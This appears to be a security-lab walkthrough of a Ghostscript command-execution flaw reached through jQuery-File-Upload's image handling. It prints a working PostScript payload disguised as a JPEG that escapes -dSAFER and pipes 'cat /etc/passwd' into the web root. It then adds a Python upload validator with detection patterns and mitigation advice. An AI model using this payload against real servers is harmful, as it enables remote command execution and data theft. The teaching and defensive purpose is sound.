jQuery-File-Upload is the second most starred jQuery project on GitHub, after the jQuery framework itself. The project was recently reported to have a three-year-old arbitrary file upload vulnerability, which was fixed in v9.22.2. During the VulnSpy team's review of the code, however, another serious vulnerability was found: a command execution flaw that lets an attacker run arbitrary system commands by uploading a crafted picture file. The file carries an image extension, which satisfies the upload handler's extension allowlist, but its body is PostScript; when the server-side image processing (ImageMagick, which delegates PostScript to Ghostscript) renders the "image", Ghostscript executes the command embedded in the file.


1. Click the START TO HACK button in the upper right corner to create an online environment.

2. Open the target address from the projects list.

3. Upload the file vsplate.jpg containing the malicious PostScript below. The .jpg extension passes the upload handler's image check, but the content is PostScript, and the server-side image conversion hands it to Ghostscript.

The payload executes cat /etc/passwd > /var/www/html/vsplate.txt, writing the result into the web root. Contents of vsplate.jpg (comments after % are explanatory):

%!PS                                  % PostScript header, so the image library identifies the file as PostScript and calls Ghostscript
userdict /setpagedevice undef         % remove setpagedevice so the page-size call below raises an error instead of resetting the device
{ null restore } stopped { pop } if   % deliberately invalid restore; the error is swallowed by stopped and the -dSAFER restrictions are no longer enforced
{ legal } stopped { pop } if          % select a page size; the call to the now-undefined setpagedevice errors and is swallowed
mark /OutputFile (%pipe%cat /etc/passwd > /var/www/html/vsplate.txt) currentdevice putdeviceprops   % set OutputFile to a %pipe% spec; Ghostscript opens it by running the command through the shell

4. Visit http://target.vsplate.me/vsplate.txt. If the page shows the contents of /etc/passwd, the command ran on the server.
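The upload above gets through because the handler trusts the file extension. The following is an added example, not code from the original page or from the jQuery-File-Upload project, showing the check a practitioner would put in front of the image pipeline: compare the real magic bytes against the extension's allowlist, and reject anything carrying PostScript/Ghostscript markers (%!PS, %pipe%, /OutputFile, putdeviceprops). The sample inputs (the walkthrough's payload saved as vsplate.jpg, and the first bytes of a genuine JPEG) are constructed inline; the extension allowlist is assumed to be jpg/jpeg/png/gif.

```python
"""Added example: sniff an uploaded "image" and refuse PostScript payloads
before it reaches ImageMagick/Ghostscript. Not part of jQuery-File-Upload."""
import re

# Constructed sample input: the walkthrough's payload saved under an image extension.
VSPLATE_JPG = (
    b"%!PS\n"
    b"userdict /setpagedevice undef\n"
    b"{ null restore } stopped { pop } if\n"
    b"{ legal } stopped { pop } if\n"
    b"mark /OutputFile (%pipe%cat /etc/passwd > /var/www/html/vsplate.txt) "
    b"currentdevice putdeviceprops\n"
)

# Constructed sample input: the start of a genuine JPEG (SOI marker + JFIF APP0 segment).
REAL_JPG = (
    b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\x00" * 32
)

# Assumed allowlist: extensions the handler accepts, with the magic bytes a real file starts with.
ALLOWED_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Byte patterns that have no business in a raster image: a PostScript header
# (text %!PS or the binary DOS-EPS header) and the Ghostscript device calls
# the payload relies on.
POSTSCRIPT_MARKERS = {
    "PostScript header": re.compile(rb"%!PS|\A\xc5\xd0\xd3\xc6"),
    "%pipe%": re.compile(rb"%pipe%"),
    "/OutputFile": re.compile(rb"/OutputFile\b"),
    "putdeviceprops": re.compile(rb"\bputdeviceprops\b"),
}


def extension_of(filename):
    """Lower-cased final extension, '' if none (what an extension-only allowlist keys on)."""
    name = filename.rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def magic_matches(extension, data):
    """True if the content starts with a signature expected for that extension."""
    return any(data.startswith(sig) for sig in ALLOWED_MAGIC.get(extension, ()))


def find_postscript_markers(data):
    """Names of the PostScript/Ghostscript markers present anywhere in the upload."""
    return [name for name, pat in POSTSCRIPT_MARKERS.items() if pat.search(data)]


def check_upload(filename, data):
    """Decide whether an upload may be handed to the image pipeline.

    Returns {'accepted': bool, 'reasons': [...], 'markers': [...]} so the
    caller can log exactly why a file was refused.
    """
    ext = extension_of(filename)
    reasons = []
    if ext not in ALLOWED_MAGIC:
        reasons.append(f"extension .{ext or '(none)'} not in allowlist")
    elif not magic_matches(ext, data):
        # This is the case the walkthrough exploits: .jpg name, PostScript body.
        reasons.append(f"content magic bytes do not match .{ext}")
    markers = find_postscript_markers(data)
    if markers:
        reasons.append("PostScript content: " + ", ".join(markers))
    return {"accepted": not reasons, "reasons": reasons, "markers": markers}


if __name__ == "__main__":
    for name, blob in (("vsplate.jpg", VSPLATE_JPG), ("photo.jpg", REAL_JPG)):
        print(name, check_upload(name, blob))
```

The magic-byte check alone already stops vsplate.jpg; the marker scan is defence in depth for files that prepend a valid image header before the PostScript. Neither replaces the real fix: do not let untrusted uploads reach Ghostscript at all (if the pipeline is ImageMagick, disable the PS/EPS/PDF coders in policy.xml) and keep Ghostscript patched.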